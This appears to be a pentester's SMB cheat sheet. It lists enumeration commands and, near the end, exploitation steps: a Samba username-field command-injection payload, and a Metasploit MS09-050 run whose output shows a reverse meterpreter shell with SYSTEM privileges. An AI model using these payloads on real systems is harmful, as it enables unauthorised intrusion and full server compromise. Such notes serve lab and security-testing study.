Skip to content

smb 139,445

SMB Enumeration

Guess Server's Version

nmap -p 139,445 $ip --script=smb-os-discovery

Detect Server's version using nmap features.

nmap -A 10.10.10.4

Scanning

smbclient

smbclient -NL //ip
smbclient -L ip --port=445 --user=Administrator

smbmap

smbmap -H $ip
smbmap -u <user> -H $ip

Scanning Vul

nmap -p 139,445 --script smb-vul* $ip

Other Tools

NetBIOS information

nbtscan -r $ip

enum4linux

enum4linux -a $ip

rpcclient

rpcclient -U "" $ip

Connect to SMB

smbclient

smbclient //ip/folder
smbclient \\\\ip\\folder -U john 

smbmap

smbmap -H 192.168.11.135 -u windows_10_1903_x64 -p passwd -r 'Users\windows_10_1903_x64\Desktop'

Mount Access

sudo mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//ip/My Share" /mnt/cifs
sudo mount -t cifs -o username=Administrator,password=123456 /mnt/win10_share -o port=445 //ip/Data
sudo mount -o nolock $ip:/home ~/home/

Windows

\\ip\a\whoami.exe

SMB Commands

srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

Config Samba

/etc/samba/smb.conf

min protocol = SMB1

SMB CVE

Samba 3.0.20 < 3.0.25rc3 - 'Username' map script'

https://www.exploit-db.com/exploits/16320

smbmap -u '/=`ping -c 2 ip`' -H ip

smb-vuln-cve2009-3103

Using python exploit but not complete, exploit here

ExploitDB: https://www.exploit-db.com/exploits/40280

$ python3 MS09_050.py ip
Enter WORKGROUP\Administrator's password: 
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
$ sudo msfconsole -q
use exploit/multi/handler
set lhost tun0
set lport 445
set EXITFUNC thread
run

Using msfconsole

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  ip    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   445              yes       The target port (TCP)
   WAIT    180              yes       The number of seconds to wait for the attack to complete.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     445              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)


msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run

[*] Started reverse TCP handler on ip
[*] ip:445 - Connecting to the target (ip:445)...
[*] ip:445 - Sending the exploit packet (951 bytes)...
[*] ip:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (175174 bytes) to ip
[*] Meterpreter session 2 opened (ip:445 -> ip:49159) at 2021-07-06 23:40:40 +0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM